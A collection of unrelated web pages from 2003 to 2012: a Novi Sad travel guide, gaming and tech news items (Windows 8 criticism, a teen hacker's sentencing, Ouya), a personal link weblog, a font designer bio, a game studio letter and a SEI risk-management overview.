According to historians, anthropologists and archeologists, area of Novi Sad was inhabited 4500 years BC. Many civilizations rode through this area; Celts, Romans, Visantins, Ostroghotes, Avars. Some of them stayed for a while and others moved forward. Millenniums and centuries after the first inhabitants came to this area, Novi Sad, its epicenter, the well known Petrovaradin was born.
Thanks to Maria Teresa, Austro-Hungarian queen, Novi Sad, as well as other near by areas of Austro-Hungarian Empire, were developing fast both in cultural and historical way. On February 1, 1748, Novi Sad was proclaimed as "Free Royal City". Today, 260 years later, with its 300,000 citizens, Petrovaradin Fortress, river Danube, Fruska gora and its monasteries, Novi Sad became the most desirable destination for young Europeans. Warmth, hospitality, diversity of languages, cultures, and nationalities, transforms Novi Sad to city cosmopolite.
Have to see...
Petrovaradin Fortress
The historic Petrovaradin Fortress is built high on the banks of the River Danube, offering stunning views over the city of Novi Sad. It is an ancient fortress site originally occupied by the Romans, and re-built by the Austro Hungarian Empire to defend against the Turks in the 17th Century. Tsar Leopold began work on its construction, but it was finished by tsar Josef, son of Empress Maria Teresa. It received its first crew in 1702 (a regiment of Hungarian hussars, light cavalry and units of Serbian hayduks).
During the first and the Second World War it was a military garrison and that is what it remained until 1951, when it was turned into a civilian object, used for cultural, artistic and tourist purposes. The Clock Tower (Sahat Kula), a monumental object on the bastion of St. Lui (Ludvig of Baden) dominates the whole military fortress.
Serbian National Theater
The new building of the Serbian National Theatre, contrived by the architect Professor Dr. Viktor Jackiewitcz is suited in the center of the town. The building was opened on March 28, 1981 (a day after the World Theatre Day). In the 120th season of its existence, the SNT get its own building for the first time. That date was than established for the Day of the Serbian National Theatre, when the results of previous season are evaluated, and the best individual and collective achievements are awarded.
The building itself spreads out on more than 20,000 square meters, housing the Opera (with the Choir and Orchestra), Drama and Ballet ensembles, performing on four stages. The ballet, orchestra and choir rehearsing rooms are in its premises too. The workshops are placed in the building too, except the "Kombinat" that produces the heavy equipments and decorations.
Dunavska Street
The most charming street in Novi Sad is Dunavska Street. Very short, in the heart of the center, it is full of colorful facades, many advertisements and shops. It looks like the time has stopped there. Straight from it you get to Dunavski Park.
Catholic Cathedral
One of the symbols of Novi Sad, neo-gothic cathedral built during the period of 1893 - 1895. is situated in the main center square of Novi Sad, Square of Freedom.
Cathedral has beautiful tall and thin shafts. It is recognizable by its tall clock tower, and vitrages made in Budapest. It has been built on the place of previous church from the mid 18 century and is devoted to St. Mary.
The building of the new synagogue, the fifth to be erected on the same location since the 18th century, became a major project for the entire Jewish community of Novi Sad under the leadership of Dr. Karl Kohn, who served as its president for nine years (1895-1906).
The building work of the Novi Sad synagogue started in 1905 and was finished in 1909. The new synagogue was part of a larger complex of buildings that included on both sides of the synagogue two edifices decorated in a similar pattern. One building sheltered the offices of the Jewish Community and the residences specially built for the synagogue officials, while the second building served the Jewish school. Located in Jevrejska (Jewish) Street, close to the city center, the synagogue has since its inauguration been recognized as a landmark of Novi Sad.
Matica Srpska
Matica srpska (lit. "Serbian matrix", meaning "parent body of the Serbs") was founded by patriotic Serbian intellectuals and rich traders in 1826 in Pest.
It was moved from Pest (by Jovan Forovic) into the building of the heritage of the famous philanthropic from Novi Sad, Mrs. Marija Trandafil in 1864. The building was built in 1912, in pseudo classicist style according to the project by Momcilo Tapavica (an architect, a top grade sportsman, the first Serb to participate in the Olympic games). It includes the journal "Letopis", a rich library, an art gallery and a publishing house. In front of the building are sculptures of all the presidents of Matica srpska: Jovan Hadzic, Sava Tekelija, Teodor Pavlovic, Platon Atanackovic, Tihomir Ostojic and Vasa Stajic.
The Matica srpska Society was one of the initiators of the Novi Sad Agreement on the Serbo-Croatian language (1954) led the action for making the unique orthography of the language (1960). They compiled The Vocabulary of Serbian Standard Literary Language in six volumes (1967-1976).
Matica srpska publishes the "Letopis Matice srpske" magazine, which is one of the oldest in the world, being continuously published since 1824. The Law of the Matica srpska Society (1986) regulates matters of endowment and legacy, given by the national benefactors, and how the money is spent for various cultural and educational purposes.
It is one of four monumental buildings on Liberty Square (Trg Slobode), the main city square.
It was built in 1895 and designed by a well-known architect Gyorgy Molnar.
The two-floor building is in the neo-baroque style, so the interior is richly decorated. There are 16 allegorical statues, the works of Julije Anika, along the facades. You can see the town's coat of arms on the upper part of the facade facing the square. The building is also decorated by a high tower with the bell of St. Florian - Matilda.
Today, the city hall is the seat of local authorities, i.e. the Executive Council the Assembly of Novi Sad, which is the executive body of the City Assembly.
The Orthodox Cathedral Church of St. George
(The Congregational Orthodox Church - Saborna Crkva)
The Cathedral church of Novi Sad is dedicated to the Holy Great Martyr George. It was built in baroque style in 1734, during the time of the empress Maria Theresia the patriarch Arsenije IV Jovanovic and the archpriest Visarion Pavlovic. It burnt down during the bombing in 1849. It was rebuilt in 1860-80, and the last reconstruction took place in 1905 thanking to archpriest Mitrofan Sevic, after the project of Mihajl Harminc, the architect from Budapest. New tower with new bells from Budapest was built as well. Twenty-six icons on the iconostasis, two historical paintings above the choir-stalls and the two great icons (on the Godmother's and the archpriest's thrones were made in 1905 by Serbian academic painter Paja Jovanovic, who also supervised the wall decorating. The window vitrages were made by Imre Zseler in Budapest after the drawings of Paja Jovanovic. The wall paintings were made by Stevan Aleksic. The church is located in Pasiceva Street. Church of the Great Martyr St. George (the Congregational Orthodox Church)
Vigil: Saturdays and holidays at 17h
St. Liturgy: Sunday, holidays at 9h, Saturday after the morning service
The Three Saint Bishops Church
Serbs, who settled to the periphery of the former Petrovaradin Trench after they moved from the village Almas, in 1718, built this church. Made of sticks it could not have lasted long, so on the same place the new larger one was built. The archpriest Visarion Pavlovic dedicated it in January 1733. In 1797 they built a new one. It is the biggest Orthodox Church in Novi Sad. It has acquired its present look at the end of the XVIII century, when it was renovated for the last time in the early classicism style. Wood carving was done by Aksentije Markovic, the iconostasis and wall paintings by Arsenije Teodorovic, the famous painter, who was buried in the churchyard. In 1905 Uros Predic painted the icon of the Virgin Mary on the throne. The church is located in Almaska Street. Church of Three St. Bishops (Almaska Church), 13 Almaska street
St. Liturgy: Sunday, holidays at 9h | 计算机 |
2015-48/3676/en_head.json.gz/7289 | Posted Blizzard agrees with Valve: Windows 8 is bad for video game makers By
The world’s biggest PC video game makers aren’t very happy about Microsoft’s new operating system, Windows 8. Speaking with one-time Microsoft Game Studios chief, Ed Fries, at a Casual Connect earlier this week, Valve’s Gabe Newell described Microsoft’s plans as a “catastrophe.”
“Windows 8 is kind of a catastrophe for everybody in the PC space,” said Newell, “I think that we’re going to lose some of the top-tier PC [original equipment manufacturers]. They’ll exit the market. I think margins are going to be destroyed for a bunch of people. If that’s true, it’s going to be a good idea to have alternative to hedge against that eventuality.”
Newell says this is why Valve is pushing hard to bring its games, its Source engine, and the Steam digital distribution platform to the Linux operating system.
Is he alone in thinking that Windows 8 will be a disaster for the PC gaming industry? Blizzard’s Rob Pardo doesn’t think so. The StarCraft designer and current vice president of game design at Diablo III studio Blizzard said that he believes Microsoft’s new operating system will also be a thorn in his company’s side.
Pardo Tweeted on Wednesday, “Nice interview with Gabe Newell—‘I think Windows 8 is a catastrophe for everyone in the PC space’—not awesome for Blizzard either.”
The belief in the development community is that Microsoft will make Windows 8 a closed system, an operating system that seeks to more stringently control, much in the way that Apple does with Mac OS X and the iOS platform. This would allow Microsoft to better monitor the quality of applications running on its platform, but it will also wall off the most widely used operating system in the world from myriad developers. PC game makers use Windows because of the openness of the platform and its ubiquity. If Microsoft takes that openness away, what will developers do?
Windows 8 won’t be released until October of this year, so Microsoft still has time to decide exactly how free game and application makers will be to use the system. Valve and Blizzard are, by sales and reputation, the biggest PC game makers in the world and their influence over Microsoft’s platform isn’t insignificant. If Blizzard and others follow Valve to Linux platforms, what will Microsoft do to lure them back? Will PC gaming become increasingly based on streaming and browser-based solutions? | 计算机 |
2015-48/3676/en_head.json.gz/7570 | Weblog Archive November - December 2002
August - October 2002
Not Exactly a Weblog; Maybe a Webzine - December 31, 2003 - Need a friend on New Year's Eve? Try Friendster. This is a unique service that allows users to make online profiles of themselves and then connect with others with similar interests creating online communities. It follows on the concept of "6 degrees of separation", that everyone is somehow related to someone else with some kind of tie through others. The site is not just for dating; some fictious identities have emerged, called Pretendsters, which can include everything from fruits to colleges. Other sites have sprung up including Tribe.net and Everyonesconnected.
December 30, 2003 - If you want to understand so of what goes on behind the sceen at the Google search engine, check out Scroogle. They are stirring up a contraversy about how Google is selectively filtering out some web sites from key words in the search. There is a demo which you can use to compare. December 29, 2003 - For those of you who are into enhancing websites with Javascript and other code, try Mind Palette - Indianapolis Web Design. There is some cool stuff and tutorials, many of which relate to the Adobe Go Live software, a decent web editting tool. If you are not that technically inclined, check out the home page and move your mouse over the eye to see what happens. December 28, 2003 - Earth Observatory from NASA has some beautiful views of earth features from space. In addition, this website details some of the research NASA scientists are doing with this data. You can even view the recent earthquake damage of Bam, Iran. You can enlarge images but they make take a while to download. Also, Internet Explorer tends to change them to fit the screen after they are loaded. Move your mouse over the image and click on the expand image to make it large again. December 27, 2003 - Project VII is a web design group which has developed many designs and widgets for creating interesting websites. All are for a charge but fun to test out for free - check out the demo selection box at the bottom of the page. I also discovered that the new Dreamweaver MX 2004 has several site templates for websites using cascading style sheets for excellent, professional-looking websites. Watch for one here soon. Note: the Macromedial website for Dreamweaver will probably require you to upgrade your version of Flash.
December 25, 2003 Mars Express from the European Space Agency.
December 24, 2003 - More websites on Mars exploration are available. This one, Center for Mars Exploration or CMEX provides a host of images which you may not have seen. Click on Gallery and then Fun and Strange.
December 22, 2003 - High resolution photography of earth from space is even now more accessible. Check out the HiRISE website which demonstrates how space-based cameras can view bolders in the Grand Canyon. December 6, 2003 - Cleveland Culture is alive and well as are their websites. Just went to the Cleveland Museum of Art Jasper Johns Numbers show and the Cleveland Botanical Garden (the Glass House of two environments is especially good). Also, planning to see the Contemporary Youth Orchestra, a local orchestra of high school students who perform 20th (and 21st) century music including new compositions. Visited Heights Arts, a small local gallery now having a Holiday sale/show. December 5, 2003 - Came across the InternetTourBus, a weird website which combines help for virus protection and strange things. Click on that link and try out some of this stuff. I like the Traffic Come Preservation Society.
December 4, 2003 - There is a new book and website to think about: 5 Patterns of Extraordinary Careers. Includes a quiz to try out and presentation tools. Is this just another business success book trying to become a trend or is there really something here?
December 3, 2003 - There are a growing number of amateur astronomer websites with their latest photos. One example is here which shows a gallery of new photos. The equipment is now available for amateurs to create better photos than professional astronomers could produce 25 or 30 years ago. Unfortunately, you have to scroll through the technical photography info but it is worth it. Some photos may take a long time to download and lookout for the popup ads.
December 2, 2003 - Join Joe is a website at The Cleveland Clinic on an initiative by Joe Eszterhas, the Hollywood screen writer, to launch his anti-smoking campaign. Maybe you've seen his public service ads on TV. If not, view them through this website.
December 1, 2003 - The Onion and The Spoof are two websites which look like the real news but aren't. Good for some laughs about current politics, society and news, just as long as you don't believe it is true.
October 8, 2003 - Did you know that the CIA has a free factbook online. It includes maps, country profiles, flags, etc. You can download or order a copy. Is anyone watching?
October 7, 2003 - Hurricane Isabel washed over the east coast in September. This astronomy photo shows an interesting comparison of spiral galaxies to hurricane Isabel. October 6, 2003 - Although the second anniversary of September 11 is past, CNN has a wonderful memorial site with photos and brief indentifying information and and tributes.
October 5, 2003 - A planet-wide color movie of Jupiter. May take a while to download but worth it. Watch the swirls.
October 4, 2003 - More Mars photos from the Mars Orbiter including a photo of the polar cap from above, something not visible from Earth.
October 3, 2003 - Just a cool website. Can you figure out how to follow links and view the work that they have done? Check out Aue Design. October 2, 2003 - A new observatory openned recently called Gemini. The name is not just of a consellation but also signifies that it is actually made up of two telescopes continents apart one in Hawaii and one in Chile. "The Gemini Observatory is an international collaboration that has built two identical 8-meter telescopes. The Frederick C. Gillett Gemini Telescope is located at Mauna Kea, Hawai`i (Gemini North) and the other telescope at Cerro Pachón in central Chile (Gemini South), and hence provide full coverage of both hemispheres of the sky. Both telescopes incorporate new technologies that allow large, relatively thin mirrors under active control to collect and focus both optical and infrared radiation from space."
October 1, 2003 - A friend shared this Mortgage Calculator - you can move slides back an forth to change amount, length of mortgage, interest rate, etc. and the page dynamically creates a graph of principle and interest over the life of the loan. August 30, 2003 - What is your favorite color? Now you can vote on the Internet at favcol.com. Send an email with your favorite photo or image and your's will be added to the mix. Click on How Does It Work? for more info.
August 29, 2003 - Need a cheap computer to access the Internet? Try WebStation from Lindows. It is promoted as, "The lowest priced Internet-enabled computer ever! The Lindows WebStation is the first ultra-affordable, "unbreakable" computer designed specifically for Web work." Only $169 but you need to buy a monitor at $100 or $300 for flat screen. What is Lindows? See August 28.
August 28, 2003 - Lindows is a PC version of the Linux Operating System. What this means is an alternative to Microsoft Windows which is a significant cost when you buy a new computer (Lindows is only $59). Lindows provides a web browser, email, etc. May be safer from viruses also.
August 27, 2003 - There is much which could be said about the close approach of Mars. If you don't have a telescope handy, let the Hubble Space Telescope do the work. Hubble occasional turns from studying the deep sky objects and the origins of the universe and looks at planets. Try the rotating Mars globe images also. Quite a treat.
August 26, 2003 - Mars has brought attention to the activities of amateur astronomers and their ability to perform incredible astrophotography. This story in Wired magazine is titled, Backyard Paparazzi to the Stars. Also, a member of an amateur group was featured on a local station in Dallas.
August 25, 2003- I must recommend the vacation spot which good friends invited us to this summer, Edisto Beach, South Carolina. South of Charleston (which we also visted), it is a wonderful, quiet place. Quite a contrast to the big resort we visited almost a decade ago, Wild Dunes.
August 24, 2003 - In searching for a new car this month, I visited a number of websites including Consumer Reports but especially, Edmunds.com. Edmunds has tons of information about cars, calculators for estimating your trade-in and estimating loan payments. Also, it gives reviews submitted by new car owners, like, "I got mine for $1000 under the sticker price."
July 27, 2003 - Steve Wozniak, one of the founders of Apple Computer has an extensive personal website called Woz.org. Includes questions and answers, a corner for the cofounder, Steve Jobs, and a Woz Cam to view Steve in his office. Lots of references to the Mac, I am surprised that it doesn't say, "Best viewed with a MacIntosh Computer."
July 26, 2003 - Bonaire WebCams claims it is the home of the world's first permanent underwater ReefCam, giving you a peek at reef life in the Bonaire Marine Park! It includes a reef cam, a beach cam and others. Best if viewed during the Carribian daytime hours. July 25, 2003 - What do you find if you do a search at Google.com, the web's most popular search engine for Weapons of Mass Destruction? The number one on the list looks like an error message unless you read it carefully. A real comment on the war in Iraq which was first noted in a British newspaper, The Guardian.
July 24, 2003 - Meetup.com is a new website service which allows you to set up an in person meeting with any group of people. Already there are 1546 different topics from politcs to Dungeons and Dragons. Haven't tried it yet since I have a similar function for work meetings. Will see if it is successful.
July 7, 2003 - Read in the New York Times today about people spending bundles of money on coffee makers including thousands on commercial expresso machines. One website noted was CoffeeGeeks.com. Another was: WholeLatteLove.com. some people get very serious about their cup of java!
June 22, 2003 - You may have seen this one in the paper: DonsBoss.com. Don has assembled some tools to download to your computer to pretend you are working while you are surfing the web or playing games at work. The test of the typing soundars are my particular favorite. You have to scroll down to see the full page. The fake spreadsheet even hides which website you are going to when you hit this page.
June 21, 2003 - What is iLoo? A hoax, a future product of Microsoft, an Internet toilet. Read about the phantom product idea by Microsoft in England which has all but disappeared except the rumors. Latest denials are on MSN.com
June 20, 2003 - May 23 was the birthday of Java Programming Language. Again, you might not care unless you are really into the web, but if you notice on a web page the message "Applet loading" or "Running Applet", that is Java at work. Launched on May 23, 1995 by Sun Microsystems, it has the capability of running on any operating system (known as being "agnostic" in web speak) which gives it real advantages in the web world where everyone is running web pages on different systems. Source: wiki.com. Wiki is in itself and interesting phenomenon which is defined as: The simplest online database that could possibly work. June 18, 2003 - Programming for Information Architects may sound boring except to web designers interesting in understanding the mysteries of progamming but most of this article can be appreciated by the lay reader familiar wit the Internet. It is helpful to understand some of the work behind the magic which programming creates in web pages.
June 17, 2003 - The 101 Dumbest Moments in Business published by Business 2.0 includes some now obvious mistakes in business which failed.
May 9, 2003 - If you wonder how web pages work or know some of the code that makes them up, called HTML, check out this reference site: Sizzling HTML Jalfrezi. It is good for beginners and more advanced users and can help from fixing problems to creating new, beautiful pages. This site recommends another beginner's guide developed by the National Center for Supercomputing Applications (NCSA).
May 8, 2003 - Sometimes a site is worth going to just because it looks cool. It you have the patience for the Flash program to download, there is lots to find here: Theory 7 - The Flash Store shows what several creative people have done with Flash and puts the art up for sale. Check out the buttons to bounce around. The link opens a new window.
May 7, 2003 - Preventing health care fraud on the Internet is a big task. Some sites which are helping and worth checking out are the Federal Trade Commission, and The National Council Against Health Fraud. May 6, 2003 - The latest award website is Privacy International's Stupid Security Contest Winners. These are submitted from throughout the world to a real panel of security experts. It is quite a catalog of security gone wild.
May 5, 2003 - A total lunar eclipse is coming up on Thursday, May 16th, goin total at 11:15pm. Should be a good one for the eastern USA. For a short explanation, go to Sky and Telescope's page, but for a more detailed and techical presentation of what to expect, try this NASA press release.
February 19, 2003 - I read more each day about the Myers-Briggs Type Indicator and wonder about the science behind it. Anyone who knows the history behind the four temperments knows that it has its roots in Medival and Greek "science" of the four humors in which based on having too much of one humor the "physician" removed it through blood-letting, diaretics, cough expectorants, etc. What makes it so scientific that it is taught in colleges, continuing education, business consultants? It has even been adopted by modern astrologers.
February 16, 2003 - I recently spoke to a Man-to-Man support group in Cleveland. These are support groups which support men with prostate cancer and their spouses. In preparation, I came across Cancer News and may add the news headlines to this website in the near future.
February 15, 2003 - A cool little piece of web technology which allows a back to top link down the page as you scroll. Check out the link on this page which floats next to the story.
February 14, 2003 - Silicon Valley has so far refuse to give up punch cards for voting even though most of California has moved on to electronic voting. Odd that this county were the high tech revolution began is resisting change. News item from Wired magazine.
February 13, 2003 - Check out this cool design, Nick Finck.com. A simple design with single words of text and photos of nature. Communicates well with such a simple design.
February 12, 2003 - Again the Cleveland Clinic website has won several awards from the WWW Health Awards including: Taussig Cancer Center (Silver), Department of Dentistry (Silver), e-Cleveland Clinic Second Opinion Program (Bronze), Center for Corporate Health (Bronze), Department of Pain Management (Bronze).
February 2, 2003 - Funny signs - The Savvy Traveler, an NPR program I sometimes listen to on the weekends, has a page devoted to signs which are good for a laugh. Make sure you check these out before you travel.
February 1, 2003 - There are a number of websites to obtain information about the Shuttle loss. These include: Spaceflightnow.com , NASA's office Shuttle Site.
January 25, 2003 - In the news this week is Kaiser Permanente, the nation's largest HMO, who will put their treatment guidelines on their website available to members. This is to include public access. Treatment guidelines have typically been created by doctors for doctors, so this is an another source of information for those with a diagnosed condition. They are not the first to put treatment guidelines on the the web, however. The Cleveland Clinic has these on their medical eduction website for some diseases written for a professional audience.
January 24, 2003 - I don't usually bother with hoaxes or their disproof but came across an interesting one related to the Apollo program. With all the claims that the landing on the moon was a NASA hoax, one engineer built an extensive website to disprove all of the claims at Moon Base Clavius.
January 23, 2003 - We recently visited the Peter B. Lewis building, Cleveland's only Gehry designed structure which is the home of the Weatherhead School of Management, Case Western Reserve University. Beyond the architecture, which features amazing stainless steel ribbons, the technology is equally cutting edge. It is featured in Cisco Systems IQ Magazine.
January 22, 2003 - There is still free stuff on the Internet. Hits4Me.com has lots of free tools for websites. I hope to try some of them soon. Watch for new features.
January 18, 2003 - Recently went to a party and met a guy wearing a Netscape 7 sweatshirt. Turns out he not only has his own website but is an avid writer on the topic of Cascading Style Sheets, Check out who he is and his books at Meyerweb.com. CSS are defined as: By attaching style sheets to structured documents on the Web (e.g. HTML), authors and readers can influence the presentation of documents without sacrificing device-independence or adding new HTML tags.(from What are Style Sheets?)
January 12, 2003 - A major conference on Healthcare Information Technology will take place in early February, the Healthcare Information and Management Systems Society or HIMSS. I have the honor of presenting a paper there on a new project. The abstract is entitled, "Creation of a Single Access Method Approach for Physicians".
January 11, 2003 - Another Google feature - their news service which is "editor-less". Basically, it is a search of 4000 news services so no writing or editting is required by Google itself. According to the email newsletter Ascribe, "The most amazing aspect of the Google service, however, is that the story selection is done entirely by computer without the need for flesh-and-blood editors. January 10, 2003 - This is a rather sad commentary on workplace motivation: someone has create a whole site created as a satire of motivational photos which have become popular in recent years. Despair.com is not a site devoted to depression but posters an caledars which mock the motivational messages. Some are pretty funny.
January 9, 2003 - I've added a Google search box to my home page. Google has the code readily available for any website. The search results page may include advertising or "sponsored links", aka advertising.
January 8, 2003 - With winter well on it's way in Northeast Ohio, I have been check Accuweather Radar online. Weather.com of the Weather Channel is also a good source for weather but I like the Accuweather format with the tabs at the top of the page for navigating the site. Click on the "Animate this map". Try your own area.
Best business mags:
Business 2.0
Line 56
New find: Weblog
Camworld - cool ability to modify style sheets with buttons | 计算机 |
2015-48/3676/en_head.json.gz/9909 | Nate Piekos graduated from Rhode Island College in 1998 with a BA in Corporate Identity design. While still in college he designed his first fonts to be used in his independent comic book, THE WHOLE ENCHILADA. On a whim, he put them online and Blambot Comic Fonts & Lettering was born. Since then, Nate’s work has appeared in books by almost every major comic book publisher, has appeared in computer magazines world wide, and have been licensed by companies like Microsoft, The Gap, The New Yorker and many more.
In 2003, Nate established his second font studio, Providence Type, as an outlet for his non-comics typography. Providence Type combines his love of fonts and his affinity for the capitol city of Rhode Island; all the ProvType fonts are named for streets and features of the “Renaissance City”.
Nate is also a musician, a professional graphic designer and an illustrator and lives with his wife in rural Rhode Island.
Born: Rhode Island, 1975
Providence Type
139 font families by Nate Piekos
AvéAvé BB™
by Blambot | 计算机 |
2015-48/3676/en_head.json.gz/10724 | Letter to the Community
Dear friends of truck simulation games,
I have news about the Euro Truck Simulator 2 release: finally, we are ready to commit to a specific release time.
This piece of good news may however be mixed with a bit of disappointment, especially for the less patient among you. We have been working on the game for almost two years, sticking to the proverbial "when it's done" planning all this time. Now, at last we are confident that the status of "good enough to be proud of the achievement" is on the horizon.
We have set the release time to first week of August 2012.
We are aware that waiting almost 6 more months is a lot for many of you. We haven't announced any release date ourselves until now, but some of our distributors have been working with speculative time-frames for the release, raising hope among you of an earlier release.
Taking 30 months to develop a game is a tough decision to arrive to. It is testing the patience of you - fans of our games, it is testing the patience of our distributors, and it is definitely testing the dedication of the development team. However we are confident that it was The Right Thing to do - we needed enough time to re-factor the graphics engine at the core of the game and to develop the cool effects on top of it, we needed the time to build the high-detail 3D models to populate the virtual world with, it took considerable effort and time to establish industrial and commercial relationships that will elevate our games to a new level. Giving in to time pressure would only result in us having to make too many compromises. We have just one chance to make a good first impression.
Euro Truck Simulator 2 will bring a massive improvement over our previous games, but in fact, it will "only" be a major milestone along a long and windy road ahead. There are many cool features that we would like to add, but lots of things will have to wait for a future game or games. Our wish list is very long, and you are constantly helping us grow it even longer with your input and feedback. It would be a dream scenario to be able to pack all those features in - season changes through the year, cities teeming with pedestrians, other types of big vehicles to drive, being able to get out of the cabin and explore the world on foot, vehicle damage from collisions, real brands for everything in the world, loading and unloading cargo from the trailer, multiplayer, covering all of Europe from Iberian Peninsula to Ural mountains, from polar circle to Asia Minor, and then going beyond the confines of Europe to both North and South America, to Africa, Asia and Australia, the list goes on and on. Euro Truck Simulator 2 should be a solid step towards the goal of the ultimate truck simulator, but only the first such step (well, second actually). With your continuing help and support, we want to continue the effort beyond the release of the game and take the remaining steps in the years to come.
Many of you may question why we are taking so long, and why we are not able to grant more of your wishes for features to include, why we are not covering more European countries. The answer is the same that we have always offered - truck simulation games are far from mainstream, and limited sales of our past games can only support a small development team. With ETS2 we have taken a bold step to grow the team size, from 5-7 to a bit over 10 people, but compared to AAA driving games productions with hundreds of people on payroll, we are tiny. We are trying to punch above our weight, putting in as much content and features as we humanly could manage to produce, but to build even more, we will have to rely on profits that should hopefully come from future sales of our games. If you want more features, bigger world and more vehicles in our games, all I can say is this: If you consider our games worth playing, consider them worth buying, too. Recommending them to friends wouldn't hurt either.
Your wait for something new from SCS Software doesn't have to take full six months though. As you have learned with the release of Trucks & Trailers, there are actually two internal teams at SCS Software now working in parallel. While the bigger team is still toiling on our opus magnum - Euro Truck Simulator 2, the smaller team is now taking advantage of a new opportunity arising out of our cooperation with the transportation industry. Very soon, you can expect an announcement about an exciting project that's under way in our labs, project which should be out even before ETS2 hits the stores. These smaller projects turn out to be significant contributors to pursuing the dream of the ultimate all-encompassing truck sim, and while they deserve merit on their own, we hope that you can understand that they are not delaying us from working on ETS2, but rather helping us finance its development and broaden its feature set.
Please keep your patience in check and stay loyal to us, and keep your eyes and mind open for future announcements from SCS Software on this blog. To keep the long wait a bit tolerable, we will be sure to post more news, images and movies from what we are working on.
Pavel Sebor
CEO, SCS Software
SCS Software
Euro Truck Simulator 2, | 计算机 |
2015-48/3676/en_head.json.gz/11248 | Home > Risk Management
OverviewGetting StartedResearchTools & Methods Additional Materials ConsultingOur People
Consider a broad range of conditions and events that can affect the potential for success, and it becomes easier to strategically allocate limited resources where and when they are needed the most.
The SEI has been conducting research and development in various aspects of risk management for more than 20 years. Over that time span, many solutions have been developed, tested, and released into the community. In the early years, we developed and conducted Software Risk Evaluations (SREs), using the Risk Taxonomy. The tactical Continuous Risk Management (CRM) approach to managing project risk followed, which is still in use today—more than 15 years after it was released. Other applications of risk management principles have been developed, including CURE (focused on COTS usage), ATAM® (with a focus on architecture), and the cyber-security-focused OCTAVE®. In 2006, the SEI Mission Success in Complex Environments (MSCE) project was chartered to develop practical and innovative methods, tools, and techniques for measuring, assessing, and managing mission risks. At the heart of this work is the Mission Risk Diagnostic (MRD), which employs a top-down analysis of mission risk.
Mission risk analysis provides a holistic view of the risk to an interactively complex, socio-technical system. The first step in this type of risk analysis is to establish the objectives that must be achieved. The objectives define the desired outcome, or "picture of success," for a system. Next, systemic factors that have a strong influence on the outcome (i.e., whether or not the objectives will be achieved) are identified. These systemic factors, called drivers, are important because they define a small set of factors that can be used to assess a system's performance and gauge whether it is on track to achieve its key objectives. The drivers are then analyzed, which enables decision makers to gauge the overall risk to the system's mission.
The MRD has proven to be effective for establishing confidence in the characteristics of software-reliant systems across the life cycle and supply chain. The SEI has the MRD in a variety of domains, including software acquisition and development; secure software development; cybersecurity incident management; and technology portfolio management. The MRD has also been blended with other SEI products to provide unique solutions to customer needs.
Although most programs and organizations use risk management when developing and operating software-reliant systems, preventable failures continue to occur at an alarming rate. In many instances, the root causes of these preventable failures can be traced to weaknesses in the risk management practices employed by those programs and organizations. For this reason, risk management research at the SEI continues. The SEI provides a wide range of risk management solutions. Many of the older SEI methodologies are still successfully used today and can provide benefits to your programs. To reach the available documentation on the older solutions, see the additional materials.
The MSCE work on mission risk analysis—top-down, systemic analyses of risk in relation to a system's mission and objectives—is better suited to managing mission risk in complex, distributed environments. These newer solutions can be used to manage mission risk across the life cycle and supply chain, enabling decision makers to more efficiently engage in the risk management process, navigate through a broad tradeoff space (including performance, reliability, safety, and security considerations, among others), and strategically allocate their limited resources when and where they are needed the most. Finally, the SEI CERT Program is using the MRD to assess software security risk across the life cycle and supply chain. As part of this work, CERT is conducting research into risk-based measurement and analysis, where the MRD is being used to direct an organization's measurement and analysis efforts. Spotlight on Risk Management
The Monitor June 2009
New Directions in Risk: A Success-Oriented Approach (2009)
A Practical Approach for Managing Risk
A Technical Overview of Risk and Opportunity Management
A Framework for Categorizing Key Drivers of Risk
Practical Risk Management: Framework and Methods | 计算机 |
2015-48/3676/en_head.json.gz/11671 | Posted Teenage hacker sentenced to six years without Internet or computers By
Cosmo the God, a 15-year-old UG Nazi hacker, was sentenced Wednesday to six years without Internet or access to a computer.
The sentencing took place in Long Beach, California. Cosmo pleaded guilty to a number of felonies including credit card fraud, bomb threats, online impersonation, and identity theft.
Cosmo and UG Nazi, a group he runs, started out as a group in opposition to SOPA. Together with his group, Cosmo managed to take down websites like NASDAQ, CIA.gov, and UFC.com among others. Cosmo also created custom techniques that gave him access to Amazon and PayPal accounts.
According to Wired’s Mat Honan, Cosmo’s terms of his probation lasting until he is 21 will be extremely difficult for the young hacker:
“He cannot use the internet without prior consent from his parole officer. Nor will he be allowed to use the Internet in an unsupervised manner, or for any purposes other than education-related ones. He is required to hand over all of his account logins and passwords. He must disclose in writing any devices that he has access to that have the capability to connect to a network. He is prohibited from having contact with any members or associates of UG Nazi or Anonymous, along with a specified list of other individuals.”
Jay Leiderman, a Los Angeles attorney with experience representing individuals allegedly part of Anonymous also thinks the punishment is very extreme:
“Ostensibly they could have locked him up for three years straight and then released him on juvenile parole. But to keep someone off the Internet for six years — that one term seems unduly harsh. You’re talking about a really bright, gifted kid in terms of all things Internet. And at some point after getting on the right path he could do some really good things. I feel that monitored Internet access for six years is a bit on the hefty side. It could sideline his whole life–his career path, his art, his skills. At some level it’s like taking away Mozart’s piano.”
There’s no doubt that for Cosmo, a kid that spends most of his days on the Internet, this sentence seems incredibly harsh. Since he’s so gifted with hacking and computers, it would be a shame for him to lose his prowess over the next six years without a chance to redeem himself. Although it wouldn’t be surprising if he found a way to sneak online during his probation. However, that kind of action wouldn’t exactly be advisable. It’s clear the FBI are taking his offenses very seriously and a violation of probation would only fan the flames.
Do you think the sentencing was harsh or appropriate punishment for Cosmo’s misdeeds? | 计算机 |
2015-48/3676/en_head.json.gz/13858 | Posted Ouya: ‘Over a thousand’ developers want to make Ouya games By
Aaron Colter
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
